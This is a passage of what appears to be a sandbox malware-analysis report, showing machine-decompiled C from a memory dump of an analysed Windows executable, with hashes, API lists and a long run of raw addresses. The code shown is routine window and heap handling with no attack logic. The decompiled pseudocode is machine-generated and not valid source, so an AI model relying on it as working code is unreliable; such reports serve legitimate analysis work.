                  • Opcode ID: cd0a42836fb6b8300c0c44a61b74ebc25a449360982cd90194564737bc53e4f1
                  • Instruction ID: 2b6379050826c6e2d676392374a914b31daace37a3fa1792e8a536dcd3cda345
                  • Opcode Fuzzy Hash: cd0a42836fb6b8300c0c44a61b74ebc25a449360982cd90194564737bc53e4f1
                  • Instruction Fuzzy Hash: 3C315D34A00244EFDB08DF94C495BAEBBB2BF44315F1480B9E881AB3D2C7789E81DB44
                  Uniqueness

                  Uniqueness Score: 0.88%

                  C-Code - Quality: 79%
                  			E0040B948(struct HWND__* _a4, signed int _a8) {
                  				struct _WINDOWPLACEMENT _v48;
                  				int _t16;
                  
                  				if(E0040B7ED() == 0) {
                  					if((_a8 & 0x00000003) == 0) {
                  						if(IsIconic(_a4) == 0) {
                  							_t16 = GetWindowRect(_a4,  &(_v48.rcNormalPosition));
                  						} else {
                  							_t16 = GetWindowPlacement(_a4,  &_v48);
                  						}
                  						if(_t16 == 0) {
                  							return 0;
                  						} else {
                  							return E0040B8F7( &(_v48.rcNormalPosition), _a8);
                  						}
                  					}
                  					return 0x12340042;
                  				}
                  				return  *0x44f5b4(_a4, _a8);
                  			}






                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 11ad636394cc0481aa147fde5a09036281f82f52467757235a65d3a07bd6b649
                  • Instruction ID: 416de8af014d9be1ea4dbf7fbfe9b48218b2e2184610911ab45494576db30b44
                  • Opcode Fuzzy Hash: 11ad636394cc0481aa147fde5a09036281f82f52467757235a65d3a07bd6b649
                  • Instruction Fuzzy Hash: DCF01D71104109AACF119F62CD089AE3A69EF00344F048032FA56B51A1DB38CA15EB9E
                  Uniqueness

                  Uniqueness Score: 0.00%

                  C-Code - Quality: 100%
                  			E00417380(void* __ecx, intOrPtr _a4) {
                  				void* _t4;
                  				intOrPtr _t13;
                  				void* _t15;
                  
                  				_t13 = _a4;
                  				_t15 = __ecx;
                  				if(_t13 == 0xffffffff) {
                  					if(IsWindowVisible( *(__ecx + 0x20)) != 0) {
                  						if(IsIconic( *(_t15 + 0x20)) != 0) {
                  							_t13 = 9;
                  						}
                  					} else {
                  						_t13 = 1;
                  					}
                  				}
                  				_t4 = E0041598D(_t15, _t13);
                  				if(_t13 == 0xffffffff) {
                  					return _t4;
                  				}
                  				E00411E2C(_t15, _t13);
                  				return E0041598D(_t15, _t13);
                  			}







                  APIs
                  Similarity
                  • API ID: IconicVisibleWindow
                  • String ID:
                  • API String ID: 1797901696-0
                  • Opcode ID: 988aec90b0cca7727ac606b941661c2c00dd2e611c9cb3af0cc4af7175605827
                  • Instruction ID: a7006baeb99b5d17a065a62b12e578f95bb816a227c233f3111b5b7526eb579a
                  • Opcode Fuzzy Hash: 988aec90b0cca7727ac606b941661c2c00dd2e611c9cb3af0cc4af7175605827
                  • Instruction Fuzzy Hash: 61F0E932354514678520163BEC0499FF67AEBD1B70700032BFCB5832F0EAA88892D4AD
                  Uniqueness

                  Uniqueness Score: 0.42%

                  C-Code - Quality: 100%
                  			E0040B793(intOrPtr __ebx, intOrPtr __esi, void* __eflags) {
                  				signed int _v8;
                  				struct _OSVERSIONINFOA _v156;
                  				signed int _t9;
                  				intOrPtr _t21;
                  				intOrPtr _t22;
                  				char _t24;
                  				signed int _t27;
                  
                  				_t25 = _t27;
                  				_t9 =  *0x44c364; // 0xa6e2bca1
                  				_v8 = _t9 ^ _t27;
                  				E004281D0(_t22,  &(_v156.dwMajorVersion), 0, 0x90);
                  				_v156.dwOSVersionInfoSize = 0x94;
                  				GetVersionExA( &_v156);
                  				return E00427DFF(0 | _v156.dwPlatformId == 0x00000002, __ebx, _v8 ^ _t25, _t21, _t22, __esi, _t24);
                  			}











                  APIs
                  Similarity
                  • API ID: Version_memset
                  • String ID:
                  • API String ID: 963298953-0
                  • Opcode ID: 420f08954292e23a38c9d747a6ee8d2bee6c913634e2ac81e1c34216473a3aa8
                  • Instruction ID: 2252e46e376e273790a687ca39325a932d4c6665e5fc8660228a25cba86eb5e5
                  • Opcode Fuzzy Hash: 420f08954292e23a38c9d747a6ee8d2bee6c913634e2ac81e1c34216473a3aa8
                  • Instruction Fuzzy Hash: 9DF06575A102189FDB60DB70DD46B9E77B8AB05304F9040A9990DD2282DE749A49CB45
                  Uniqueness

                  Uniqueness Score: 2.84%

                  C-Code - Quality: 100%
                  			E004016A0(void* __ecx) {
                  				void* _v8;
                  				void* _v12;
                  				void* _t17;
                  
                  				_v12 = __ecx;
                  				_t17 = _v12;
                  				 *_t17 = 0x43ab14;
                  				if( *((intOrPtr*)(_v12 + 8)) != 0) {
                  					_t17 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v12 + 8)))) + 8))))( *((intOrPtr*)(_v12 + 8)));
                  				}
                  				if( *(_v12 + 0xc) != 0) {
                  					_t17 = GetProcessHeap();
                  					_v8 = _t17;
                  					if(_v8 != 0) {
                  						return HeapFree(_v8, 0,  *(_v12 + 0xc));
                  					}
                  				}
                  				return _t17;
                  			}







                  APIs
                  • GetProcessHeap.KERNEL32(?,00401405,?,00000000,00000000,00000000,?,?,?,000000B0,A6E2BCA1), ref: 004016D8
                  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 004016F4
                  Similarity
                  • API ID: Heap$FreeProcess
                  • String ID:
                  • API String ID: 3859560861-0
                  • Opcode ID: 71d61eb308d1951383eabd381a20f65ce984919a870f1665cb49abb8beb88e83
                  • Instruction ID: 25a4d7d81e8201bb1a74ca22a4280da927f764245526193af182e23a0e438961
                  • Opcode Fuzzy Hash: 71d61eb308d1951383eabd381a20f65ce984919a870f1665cb49abb8beb88e83
                  • Instruction Fuzzy Hash: 2901FB34A00208EFC704DF94D888A5EFBB2EB48314F1481E9D8496B3A0C735AD91CF54
                  Uniqueness

                  Uniqueness Score: 0.01%

                  C-Code - Quality: 37%
                  			E0041032F(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
                  				signed int _t156;
                  				signed int _t158;
                  				signed int* _t161;
                  				intOrPtr _t168;
                  				intOrPtr* _t169;
                  				signed int _t172;
                  				signed int _t175;
                  				signed int* _t179;
                  				signed int* _t182;
                  				signed int _t186;
                  				signed int _t190;
                  				signed int _t194;
                  				signed int _t198;
                  				signed int* _t203;
                  				signed int _t204;
                  				signed int _t205;
                  				intOrPtr* _t206;
                  				signed int _t207;
                  				signed int _t222;
                  				signed int _t226;
                  				unsigned int _t233;
                  				void* _t234;
                  
                  				_t209 = __ecx;
                  				_push(0x70);
                  				E0042922B(E00438A45, __ebx, __edi, __esi);
                  				_t231 = __ecx;
                  				 *((intOrPtr*)(_t234 - 0x10)) = 0;
                  				 *((intOrPtr*)(_t234 - 0x14)) = 0x7fffffff;
                  				_t198 =  *(_t234 + 8);
                  				 *(_t234 - 4) = 0;
                  				if(_t198 != 0x111) {
                  					__eflags = _t198 - 0x4e;
                  					if(_t198 != 0x4e) {
                  						_t233 =  *(_t234 + 0x10);
                  						__eflags = _t198 - 6;
                  						if(_t198 == 6) {
                  							E0040FD1B(_t209, _t231,  *((intOrPtr*)(_t234 + 0xc)), E0040E20E(_t198, __ecx, _t233));
                  						}
                  						__eflags = _t198 - 0x20;
                  						if(_t198 != 0x20) {
                  							L12:
                  							_t156 =  *(_t231 + 0x4c);
                  							__eflags = _t156;
                  							if(_t156 == 0) {
                  								L20:
                  								_t158 =  *((intOrPtr*)( *_t231 + 0x28))();
                  								 *(_t234 + 0x10) = _t158;
                  								E0040CCF3(_t234 - 0x14, _t233, 7);
                  								_t203 = 0x44ddb0 + ((_t158 ^  *(_t234 + 8)) & 0x000001ff) * 0xc;
                  								 *(_t234 - 0x18) = _t203;
                  								__eflags =  *(_t234 + 8) -  *_t203;
                  								if( *(_t234 + 8) !=  *_t203) {
                  									L25:
                  									_t161 =  *(_t234 - 0x18);
                  									_t204 =  *(_t234 + 0x10);
                  									 *_t161 =  *(_t234 + 8);
                  									_t161[2] = _t204;
                  									while(1) {
                  										__eflags =  *_t204;
                  										if( *_t204 == 0) {
                  											break;
                  										}
                  										__eflags =  *(_t234 + 8) - 0xc000;
                  										_push(0);
                  										_push(0);
                  										if( *(_t234 + 8) >= 0xc000) {
                  											_push(0xc000);
                  											_push( *((intOrPtr*)( *(_t234 + 0x10) + 4)));
                  											while(1) {
                  												_t205 = E0040C280();
                  												__eflags = _t205;
                  												if(_t205 == 0) {
                  													break;
                  												}
                  												__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t205 + 0x10)))) -  *(_t234 + 8);
                  												if( *((intOrPtr*)( *((intOrPtr*)(_t205 + 0x10)))) ==  *(_t234 + 8)) {
                  													( *(_t234 - 0x18))[1] = _t205;
                  													E0040CD27(_t234 - 0x14);
                  													L113:
                  													_t206 =  *((intOrPtr*)(_t205 + 0x14));
                  													L114:
                  													_push(_t233);
                  													L115:
                  													_push( *((intOrPtr*)(_t234 + 0xc)));
                  													L116:
                  													_t168 =  *_t206();
                  													L117:
                  													 *((intOrPtr*)(_t234 - 0x10)) = _t168;
                  													goto L118;
                  												}
                  												_push(0);
                  												_push(0);
                  												_push(0xc000);
                  												_t207 = _t205 + 0x18;
                  												__eflags = _t207;
                  												_push(_t207);
                  											}
                  											_t204 =  *(_t234 + 0x10);
                  											L36:
                  											_t204 =  *_t204();
                  											 *(_t234 + 0x10) = _t204;
                  											continue;
                  										}
                  										_push( *(_t234 + 8));
                  										_push( *((intOrPtr*)(_t204 + 4)));
                  										_t175 = E0040C280();
                  										 *(_t234 + 0x10) = _t175;
                  										__eflags = _t175;
                  										if(_t175 == 0) {
                  											goto L36;
                  										}
                  										( *(_t234 - 0x18))[1] = _t175;
                  										E0040CD27(_t234 - 0x14);
                  										L29:
                  										_t222 =  *((intOrPtr*)( *(_t234 + 0x10) + 0x10)) - 1;
                  										__eflags = _t222 - 0x53;
                  										if(__eflags > 0) {
                  											goto L118;
                  										}
                  										switch( *((intOrPtr*)(_t222 * 4 +  &M004108F3))) {
                  											case 0:
                  												_push(E00414668(__ebx, __ecx, __edi, __esi, __eflags,  *(__ebp + 0xc)));
                  												goto L44;
                  											case 1:
                  												_push( *(__ebp + 0xc));
                  												goto L44;
                  											case 2:
                  												__eax = __esi;
                  												__eax = __esi >> 0x10;
                  												__eflags = __eax;
                  												_push(__eax);
                  												__eax = __si & 0x0000ffff;
                  												_push(__si & 0x0000ffff);
                  												__eax = E0040E20E(__ebx, __ecx,  *(__ebp + 0xc));
                  												goto L50;
                  											case 3:
                  												_push(__esi);
                  												__eax = E0040E20E(__ebx, __ecx,  *(__ebp + 0xc));
                  												goto L42;
                  											case 4:
                  												_push(__esi);
                  												L44:
                  												__ecx = __edi;
                  												__eax =  *__ebx();
                  												goto L117;
                  											case 5:
                  												__ecx = __ebp - 0x28;
                  												E004141D8(__ebp - 0x28) =  *(__esi + 4);
                  												__ecx = __ebp - 0x7c;
                  												 *((char*)(__ebp - 4)) = 1;
                  												 *(__ebp - 0x24) =  *(__esi + 4);
                  												__eax = E0040CD71(__ecx, __eflags);
                  												__eax =  *__esi;
                  												__esi =  *(__esi + 8);
                  												 *((char*)(__ebp - 4)) = 2;
                  												 *(__ebp - 0x5c) = __eax;
                  												__eax = E0040E23A(__ebx, __ecx, __edi, __esi, __eflags, __eax);
                  												__eflags = __eax;
                  												if(__eax == 0) {
                  													__eax =  *(__edi + 0x4c);
                  													__eflags = __eax;
                  													if(__eax != 0) {
                  														__ecx = __eax + 0x24;
                  														__eax = E00420D2A(__eax + 0x24,  *(__ebp - 0x5c));
                  														__eflags = __eax;
                  														if(__eax != 0) {
                  															 *(__ebp - 0x2c) = __eax;
                  														}
                  													}
                  													__eax = __ebp - 0x7c;
                  												}
                  												_push(__esi);
                  												_push(__eax);
                  												__eax = __ebp - 0x28;
                  												_push(__ebp - 0x28);
                  												__ecx = __edi;
                  												__eax =  *__ebx();
                  												 *(__ebp - 0x24) =  *(__ebp - 0x24) & 0x00000000;
                  												_t84 = __ebp - 0x5c;
                  												 *_t84 =  *(__ebp - 0x5c) & 0x00000000;
                  												__eflags =  *_t84;
                  												__ecx = __ebp - 0x7c;
                  												 *(__ebp - 0x10) = __ebp - 0x28;
                  												 *((char*)(__ebp - 4)) = 1;
                  												__eax = E0040EBF1(__ebx, __ebp - 0x7c, __edi, __esi,  *_t84);
                  												goto L59;
                  											case 6:
                  												__ecx = __ebp - 0x28;
                  												E004141D8(__ebp - 0x28) =  *(__esi + 4);
                  												_push( *(__esi + 8));
                  												 *(__ebp - 0x24) =  *(__esi + 4);
                  												__eax = __ebp - 0x28;
                  												_push(__ebp - 0x28);
                  												__ecx = __edi;
                  												 *((char*)(__ebp - 4)) = 3;
                  												__eax =  *__ebx();
                  												 *(__ebp - 0x24) =  *(__ebp - 0x24) & 0x00000000;
                  												 *(__ebp - 0x10) = __ebp - 0x28;
                  												L59:
                  												__ecx = __ebp - 0x28;
                  												 *((char*)(__ebp - 4)) = 0;
                  												__eax = E004146E5(__ecx);
                  												goto L118;
                  											case 7:
                  												__eax =  *(__ebp + 0xc);
                  												__eax =  *(__ebp + 0xc) >> 0x10;
                  												__eflags = __eax;
                  												_push(__eax);
                  												__eax = E0040E20E(__ebx, __ecx, __esi);
                  												goto L62;
                  											case 8:
                  												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
                  												_push( *(__ebp + 0xc) >> 0x10);
                  												__eax =  *(__ebp + 0xc) & 0x0000ffff;
                  												goto L42;
                  											case 9:
                  												goto L114;
                  											case 0xa:
                  												_push(E0041F7CC(__ebx, __ecx, __edi, __esi, __eflags, __esi));
                  												__eax =  *(__ebp + 0xc);
                  												__eax =  *(__ebp + 0xc) >> 0x10;
                  												L62:
                  												_push(__eax);
                  												__eax =  *(__ebp + 0xc) & 0x0000ffff;
                  												L50:
                  												_push(__eax);
                  												__ecx = __edi;
                  												__eax =  *__ebx();
                  												goto L117;
                  											case 0xb:
                  												_push(__esi);
                  												goto L110;
                  											case 0xc:
                  												_push( *(__ebp + 0xc));
                  												goto L66;
                  											case 0xd:
                  												__ecx = __edi;
                  												__eax =  *__ebx();
                  												goto L118;
                  											case 0xe:
                  												__eax =  *(__ebp + 0xc);
                  												__eax =  *(__ebp + 0xc) >> 0x10;
                  												__eflags = __eax;
                  												_push(__eax);
                  												__eax =  *(__ebp + 0xc) & 0x0000ffff;
                  												goto L69;
                  											case 0xf:
                  												_push(__esi >> 0x10);
                  												__eax = __si;
                  												goto L69;
                  											case 0x10:
                  												__eax = __esi;
                  												__eax = __esi >> 0x10;
                  												__eflags = __eax;
                  												_push(__eax);
                  												__eax = __si & 0x0000ffff;
                  												goto L72;
                  											case 0x11:
                  												__eax = E0040E20E(__ebx, __ecx, __esi);
                  												goto L48;
                  											case 0x12:
                  												__ecx = __edi;
                  												__eax =  *__ebx();
                  												goto L117;
                  											case 0x13:
                  												_push(E0040E20E(__ebx, __ecx,  *(__ebp + 0xc)));
                  												_push(E0040E20E(__ebx, __ecx, __esi));
                  												__eax = 0;
                  												__eflags =  *((intOrPtr*)(__edi + 0x20)) - __esi;
                  												_t112 =  *((intOrPtr*)(__edi + 0x20)) == __esi;
                  												__eflags = _t112;
                  												__eax = 0 | _t112;
                  												goto L75;
                  											case 0x14:
                  												__eax = E00414668(__ebx, __ecx, __edi, __esi, __eflags,  *(__ebp + 0xc));
                  												goto L77;
                  											case 0x15:
                  												__eax = E0041F7CC(__ebx, __ecx, __edi, __esi, __eflags,  *(__ebp + 0xc));
                  												goto L77;
                  											case 0x16:
                  												__esi = __esi >> 0x10;
                  												_push(__esi >> 0x10);
                  												__eax = __si;
                  												_push(__si);
                  												__eax = E0041F7CC(__ebx, __ecx, __edi, __esi, __eflags,  *(__ebp + 0xc));
                  												goto L75;
                  											case 0x17:
                  												_push( *(__ebp + 0xc));
                  												goto L81;
                  											case 0x18:
                  												_push(__esi);
                  												L81:
                  												__eax = E0040E20E(__ebx, __ecx);
                  												L77:
                  												_push(__eax);
                  												goto L66;
                  											case 0x19:
                  												__eax = __esi;
                  												__eax = __esi >> 0x10;
                  												__eflags = __eax;
                  												_push(__eax);
                  												__eax = __si & 0x0000ffff;
                  												goto L84;
                  											case 0x1a:
                  												__eax = __si;
                  												__esi = __esi >> 0x10;
                  												__ecx = __si;
                  												_push(__ecx);
                  												L84:
                  												_push(__eax);
                  												__eax = E0040E20E(__ebx, __ecx,  *(__ebp + 0xc));
                  												goto L75;
                  											case 0x1b:
                  												_push(__esi);
                  												__eax = E0040E20E(__ebx, __ecx,  *(__ebp + 0xc));
                  												goto L69;
                  											case 0x1c:
                  												__eax =  *(__ebp + 0xc);
                  												__eax =  *(__ebp + 0xc) >> 0x10;
                  												__eflags = __eax;
                  												_push(__eax);
                  												__eax = E0040E20E(__ebx, __ecx, __esi);
                  												goto L88;
                  											case 0x1d:
                  												__ecx =  *(__ebp + 0xc);
                  												__edx = __cx;
                  												__ecx =  *(__ebp + 0xc) >> 0x10;
                  												__ecx = __cx;
                  												 *((intOrPtr*)(__ebp + 8)) = __edx;
                  												 *(__ebp + 0xc) = __ecx;
                  												__eflags = __eax - 0x2a;
                  												if(__eax != 0x2a) {
                  													_push(__ecx);
                  													_push(__edx);
                  													goto L111;
                  												}
                  												_push(E0040E20E(__ebx, __ecx, __esi));
                  												_push( *(__ebp + 0xc));
                  												_push( *((intOrPtr*)(__ebp + 8)));
                  												goto L73;
                  											case 0x1e:
                  												_push(__esi);
                  												L66:
                  												__ecx = __edi;
                  												__eax =  *__ebx();
                  												goto L118;
                  											case 0x1f:
                  												_push(__esi);
                  												_push( *(__ebp + 0xc));
                  												__ecx = __edi;
                  												__eax =  *__ebx();
                  												goto L2;
                  											case 0x20:
                  												__eax = __si;
                  												__eflags = __esi;
                  												__ecx = __si;
                  												_push(__ecx);
                  												L42:
                  												_push(__eax);
                  												goto L116;
                  											case 0x21:
                  												__eax =  *(__ebp + 0xc);
                  												_push(__esi);
                  												__eax =  *(__ebp + 0xc) >> 0x10;
                  												L88:
                  												_push(__eax);
                  												__eax =  *(__ebp + 0xc) & 0x0000ffff;
                  												L75:
                  												_push(__eax);
                  												goto L73;
                  											case 0x22:
                  												__eax = __si;
                  												__esi = __esi >> 0x10;
                  												__ecx = __si;
                  												_push(__si);
                  												L72:
                  												_push(__eax);
                  												_push( *(__ebp + 0xc));
                  												L73:
                  												__ecx = __edi;
                  												__eax =  *__ebx();
                  												goto L118;
                  											case 0x23:
                  												__eax = __si;
                  												__esi = __esi >> 0x10;
                  												__ecx = __si;
                  												_push(__si);
                  												_push(__si);
                  												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
                  												_push( *(__ebp + 0xc) >> 0x10);
                  												__eax =  *(__ebp + 0xc) & 0x0000ffff;
                  												_push( *(__ebp + 0xc) & 0x0000ffff);
                  												__ecx = __edi;
                  												__eax =  *__ebx();
                  												 *(__ebp - 0x10) =  *(__ebp + 0xc) & 0x0000ffff;
                  												L6:
                  												__eflags = _t194;
                  												if(_t194 != 0) {
                  													goto L118;
                  												}
                  												goto L39;
                  											case 0x24:
                  												__eax = __si;
                  												__esi = __esi >> 0x10;
                  												__ecx = __si;
                  												_push(__si);
                  												_push(__si);
                  												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
                  												_push( *(__ebp + 0xc) >> 0x10);
                  												__eax =  *(__ebp + 0xc) & 0x0000ffff;
                  												_push( *(__ebp + 0xc) & 0x0000ffff);
                  												__ecx = __edi;
                  												__eax =  *__ebx();
                  												goto L118;
                  											case 0x25:
                  												goto L118;
                  											case 0x26:
                  												__ecx = __edi;
                  												__eax =  *__ebx();
                  												 *(__ebp - 0x10) = __eax;
                  												__eflags = __eax;
                  												if(__eax == 0) {
                  													goto L118;
                  												}
                  												L39:
                  												 *(_t234 - 4) =  *(_t234 - 4) | 0xffffffff;
                  												E0040CD27(_t234 - 0x14);
                  												_t172 = 0;
                  												__eflags = 0;
                  												goto L40;
                  											case 0x27:
                  												__eax = E0041F7CC(__ebx, __ecx, __edi, __esi, __eflags, __esi);
                  												L48:
                  												_push(__eax);
                  												L110:
                  												_push( *(__ebp + 0xc));
                  												goto L111;
                  											case 0x28:
                  												_push(E0041F7CC(__ebx, __ecx, __edi, __esi, __eflags, __esi));
                  												goto L115;
                  											case 0x29:
                  												_push(__esi);
                  												__eax = E0041F7CC(__ebx, __ecx, __edi, __esi, __eflags,  *(__ebp + 0xc));
                  												goto L69;
                  											case 0x2a:
                  												__ecx = __si & 0x0000ffff;
                  												_push(__si & 0x0000ffff);
                  												__eax = __esi;
                  												__eax = __esi >> 0x10;
                  												__ecx = __eax;
                  												__ecx = __eax & 0x0000f000;
                  												_push(__ecx);
                  												__eax = __eax & 0x00000fff;
                  												__eflags = __eax;
                  												_push(__eax);
                  												__eax = E0040E20E(__ebx, __ecx,  *(__ebp + 0xc));
                  												goto L104;
                  											case 0x2b:
                  												__eax =  *(__ebp + 0xc) & 0x000000ff;
                  												_push(__esi);
                  												L69:
                  												_push(__eax);
                  												L111:
                  												__ecx = __edi;
                  												__eax =  *__ebx();
                  												goto L118;
                  											case 0x2c:
                  												__eax = __si;
                  												__esi = __esi >> 0x10;
                  												__ecx = __si;
                  												_push(__si);
                  												_push(__si);
                  												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
                  												_push( *(__ebp + 0xc) >> 0x10);
                  												__eax =  *(__ebp + 0xc) & 0x0000ffff;
                  												L104:
                  												_push(__eax);
                  												goto L105;
                  											case 0x2d:
                  												__eax = __si;
                  												__esi = __esi >> 0x10;
                  												__ecx = __si;
                  												_push(__si);
                  												_push(__si);
                  												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
                  												_push( *(__ebp + 0xc) >> 0x10);
                  												_push( *(__ebp + 0xc));
                  												L105:
                  												__ecx = __edi;
                  												__eax =  *__ebx();
                  												goto L2;
                  										}
                  									}
                  									_t179 =  *(_t234 - 0x18);
                  									_t58 =  &(_t179[1]);
                  									 *_t58 = _t179[1] & 0x00000000;
                  									__eflags =  *_t58;
                  									E0040CD27(_t234 - 0x14);
                  									goto L39;
                  								}
                  								_t182 = _t203;
                  								__eflags =  *(_t234 + 0x10) - _t182[2];
                  								if( *(_t234 + 0x10) != _t182[2]) {
                  									goto L25;
                  								}
                  								_t205 = _t182[1];
                  								 *(_t234 + 0x10) = _t205;
                  								E0040CD27(_t234 - 0x14);
                  								__eflags = _t205;
                  								if(_t205 == 0) {
                  									goto L39;
                  								}
                  								__eflags =  *(_t234 + 8) - 0xc000;
                  								if( *(_t234 + 8) < 0xc000) {
                  									goto L29;
                  								}
                  								goto L113;
                  							}
                  							__eflags =  *(_t156 + 0x74);
                  							if( *(_t156 + 0x74) <= 0) {
                  								goto L20;
                  							}
                  							__eflags = _t198 - 0x200;
                  							if(_t198 < 0x200) {
                  								L16:
                  								__eflags = _t198 - 0x100;
                  								if(_t198 < 0x100) {
                  									L18:
                  									__eflags = _t198 - 0x281 - 0x10;
                  									if(_t198 - 0x281 > 0x10) {
                  										goto L20;
                  									}
                  									L19:
                  									_t186 =  *((intOrPtr*)( *( *(_t231 + 0x4c)) + 0x94))(_t198,  *((intOrPtr*)(_t234 + 0xc)), _t233, _t234 - 0x10);
                  									__eflags = _t186;
                  									if(_t186 != 0) {
                  										goto L118;
                  									}
                  									goto L20;
                  								}
                  								__eflags = _t198 - 0x10f;
                  								if(_t198 <= 0x10f) {
                  									goto L19;
                  								}
                  								goto L18;
                  							}
                  							__eflags = _t198 - 0x209;
                  							if(_t198 <= 0x209) {
                  								goto L19;
                  							}
                  							goto L16;
                  						} else {
                  							_t190 = E0040FD93(_t198, _t231, _t231, _t233, _t233 >> 0x10);
                  							__eflags = _t190;
                  							if(_t190 != 0) {
                  								L2:
                  								 *((intOrPtr*)(_t234 - 0x10)) = 1;
                  								L118:
                  								_t169 =  *((intOrPtr*)(_t234 + 0x14));
                  								if(_t169 != 0) {
                  									 *_t169 =  *((intOrPtr*)(_t234 - 0x10));
                  								}
                  								 *(_t234 - 4) =  *(_t234 - 4) | 0xffffffff;
                  								E0040CD27(_t234 - 0x14);
                  								_t172 = 1;
                  								L40:
                  								return E00429303(_t172);
                  							}
                  							goto L12;
                  						}
                  					}
                  					_t226 =  *(_t234 + 0x10);
                  					__eflags =  *_t226;
                  					if( *_t226 == 0) {
                  						goto L39;
                  					}
                  					_push(_t234 - 0x10);
                  					_push(_t226);
                  					_push( *((intOrPtr*)(_t234 + 0xc)));
                  					_t194 =  *((intOrPtr*)( *__ecx + 0xf4))();
                  					goto L6;
                  				}
                  				_push( *(_t234 + 0x10));
                  				_push( *((intOrPtr*)(_t234 + 0xc)));
                  				if( *((intOrPtr*)( *__ecx + 0xf0))() == 0) {
                  					goto L39;
                  				}
                  				goto L2;
                  			}

























                  0x004107c3
                  0x004107c6
                  0x004106d0
                  0x004106d0
                  0x004106d1
                  0x004106d4
                  0x004106d4
                  0x004106d6
                  0x00000000
                  0x00000000
                  0x004107cc
                  0x004107cf
                  0x004107d2
                  0x004107d5
                  0x004107d6
                  0x004107da
                  0x004107dd
                  0x004107de
                  0x004107e2
                  0x004107e3
                  0x004107e5
                  0x004107e7
                  0x0041039b
                  0x0041039b
                  0x0041039d
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004107ef
                  0x004107f2
                  0x004107f5
                  0x004107f8
                  0x004107f9
                  0x004107fd
                  0x00410800
                  0x00410801
                  0x00410805
                  0x00410806
                  0x00410808
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0041080f
                  0x00410811
                  0x00410813
                  0x00410816
                  0x00410818
                  0x00000000
                  0x00000000
                  0x0041053f
                  0x0041053f
                  0x00410546
                  0x0041054b
                  0x0041054b
                  0x00000000
                  0x00000000
                  0x00410824
                  0x0041058b
                  0x0041058b
                  0x004108ac
                  0x004108ac
                  0x00000000
                  0x00000000
                  0x00410834
                  0x00000000
                  0x00000000
                  0x0041083a
                  0x0041083e
                  0x00000000
                  0x00000000
                  0x00410848
                  0x0041084b
                  0x0041084c
                  0x0041084e
                  0x00410851
                  0x00410853
                  0x00410859
                  0x0041085a
                  0x0041085a
                  0x0041085f
                  0x00410863
                  0x00000000
                  0x00000000
                  0x00410872
                  0x00410876
                  0x004106b5
                  0x004106b5
                  0x004108af
                  0x004108af
                  0x004108b1
                  0x00000000
                  0x00000000
                  0x0041087c
                  0x0041087f
                  0x00410882
                  0x00410885
                  0x00410886
                  0x0041088a
                  0x0041088d
                  0x0041088e
                  0x00410868
                  0x00410868
                  0x00000000
                  0x00000000
                  0x00410894
                  0x00410897
                  0x0041089a
                  0x0041089d
                  0x0041089e
                  0x004108a2
                  0x004108a5
                  0x004108a6
                  0x00410869
                  0x00410869
                  0x0041086b
                  0x00000000
                  0x00000000
                  0x004104e2
                  0x00410530
                  0x00410533
                  0x00410533
                  0x00410533
                  0x0041053a
                  0x00000000
                  0x0041053a
                  0x00410462
                  0x00410464
                  0x00410467
                  0x00000000
                  0x00000000
                  0x00410469
                  0x0041046f
                  0x00410472
                  0x00410477
                  0x00410479
                  0x00000000
                  0x00000000
                  0x0041047f
                  0x00410486
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00410488
                  0x004103e0
                  0x004103e4
                  0x00000000
                  0x00000000
                  0x004103e6
                  0x004103ec
                  0x004103f6
                  0x004103f6
                  0x004103fc
                  0x00410406
                  0x0041040c
                  0x0041040f
                  0x00000000
                  0x00000000
                  0x00410411
                  0x0041041f
                  0x00410425
                  0x00410427
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00410427
                  0x004103fe
                  0x00410404
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00410404
                  0x004103ee
                  0x004103f4
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004103c5
                  0x004103d0
                  0x004103d5
                  0x004103d7
                  0x0041036d
                  0x0041036d
                  0x004108d1
                  0x004108d1
                  0x004108d6
                  0x004108db
                  0x004108db
                  0x004108dd
                  0x004108e4
                  0x004108eb
                  0x0041054d
                  0x00410552
                  0x00410552
                  0x00000000
                  0x004103d7
                  0x004103c3
                  0x0041037e
                  0x00410381
                  0x00410383
                  0x00000000
                  0x00000000
                  0x0041038e
                  0x0041038f
                  0x00410390
                  0x00410395
                  0x00000000
                  0x00410395
                  0x00410357
                  0x0041035c
                  0x00410367
                  0x00000000
                  0x00000000
                  0x00000000

                  APIs
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: H_prolog3
                  • String ID:
                  • API String ID: 431132790-0
                  • Opcode ID: 0ca6b6c23720b79fe6d1d534efebe6f37779338159e608e25ba41da051b062a7
                  • Instruction ID: 272999bfce609d1bbf838bf6bc52ebe8c42bd7f7b6864a752bc20ed9ec0a6e55
                  • Opcode Fuzzy Hash: 0ca6b6c23720b79fe6d1d534efebe6f37779338159e608e25ba41da051b062a7
                  • Instruction Fuzzy Hash: 94F18F70500219EFDF14EF55C880AFE77A9EF04314F10852AF816AB292DBB8D9D1DB69
                  Uniqueness

                  Uniqueness Score: 0.01%

                  Strings
                  Memory Dump Source
